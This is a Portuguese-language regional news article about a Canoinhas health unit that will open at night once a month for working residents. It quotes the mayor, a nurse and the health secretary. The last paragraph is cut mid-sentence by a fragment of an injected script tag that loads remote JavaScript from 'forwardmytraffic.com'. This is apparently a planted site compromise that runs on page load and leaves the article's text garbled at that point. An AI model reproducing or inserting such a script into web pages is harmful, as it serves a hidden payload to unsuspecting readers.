InícioSaúdeUnidade de Saúde do Campo D’Água Verde abrirá à noite

Unidade de Saúde do Campo D’Água Verde abrirá à noite

Últimas notícias

Penso, logo destino: Cerca de 886 pneus em desuso são recolhidos em Três Barras

O município de Três Barras realizou nesta quarta-feira, 24,...

Vítima de acidente para encima do teto do carro após colisão

Na tarde desta quarta-feira, 25, por volta das 16h30, ...

O Governo do Município de Canoinhas, por meio da Secretaria de Saúde, lança projeto pioneiro na região nesta terça-feira, 15: é o “Saúde do Trabalhador”. Uma vez por mês a Unidade de Saúde do Campo D’Água Verde atenderá à noite trabalhadores que moram na área de abrangência da unidade do Campo que possuem atividades profissionais durante o dia e que não conseguem liberação para irem até o posto durante o dia.  “Todos têm o direito de cuidarem da saúde e ao abrir durante a noite, estamos garantido este acesso a quem trabalha também. Esse projeto é mais uma ação do ‘Canoinhas, cidade que eu amo’ lançado na semana passada”, explica o prefeito Beto Passos.

 

 

A unidade ampliará o horário de funcionamento com atendimento programado médico, odontológico, de enfermagem e farmacêutico até as 21h todas as terceiras terças do mês. “O atendimento será apenas por agendamento que será feito durante todo o mês, devendo ser apresentado documento que comprove a não possibilidade de comparecer a consultas em horários tradicionais”, explica a enfermeira Kátia Oleskovicz.

 

 

 

As urgências e emergências continuam sendo atendidas na Unidade de Pronto Atendimento (UPA). “Além de ser oportunidade e garantia de acesso ao trabalhador, este projeto também é promoção de saúde planejada dentro da nossa política de saúde pública que avançou consideravelmente no último ano. E para confirmar basta perceber as melhoras no atendimento da UPA, por exemplo, e das unidades de saúde que estão com o atendimento por acolhimento”, destaca a secretária de Saúde, Zenici Dreher.

 

 

A secretária lembra outro projeto que está sendo desenvolvido no Campo D’Água Verde: o prontuário eletrônico. “Era nosso compromisso iniciar esta integração de informações e começamos por esta unidade também”…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.